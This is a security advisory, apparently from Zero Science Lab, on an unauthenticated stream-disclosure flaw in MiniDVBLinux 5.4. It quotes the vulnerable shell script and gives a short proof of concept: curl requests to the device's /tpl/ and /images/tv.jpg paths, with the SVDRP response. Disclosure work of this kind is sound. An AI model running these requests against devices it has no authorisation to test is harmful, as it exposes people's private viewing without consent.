MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability  
Vendor: MiniDVBLinux  
Product web page:  
Affected version: <=5.4  
Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple  
way to convert a standard PC into a Multi Media Centre based on the  
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this  
Linux based Digital Video Recorder: Watch TV, Timer controlled  
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration  
via browser, and a lot more. MLD strives to be as small as possible,  
modular, simple. It supports numerous hardware platforms, like classic  
desktops in 32/64bit and also various low power ARM systems.  
Desc: The application suffers from an unauthenticated live stream  
disclosure when /tpl/ is called and generates a snapshot  
in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).  
01: #!/bin/sh  
03: header  
05: quality=60  
06: "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"  
07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null  
Tested on: MiniDVBLinux 5.4  
BusyBox v1.25.1  
Architecture: armhf, armhf-rpi2  
GNU/Linux (armv7l)  
VideoDiskRecorder 2.4.6  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
Advisory ID: ZSL-2022-5716  
Advisory URL:  
1. Generate screengrab:  
- Request: curl http://ip:8008/tpl/ -H "Accept: */*"  
- Response:   
220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8  
250 Grabbed image /tmp/tv.jpg 60  
221 mld closing connection  
2. View screengrab:  
- Request: curl http://ip:8008/images/tv.jpg  
3. Or use a browser:  
- http://ip:8008/home?site=remotecontrol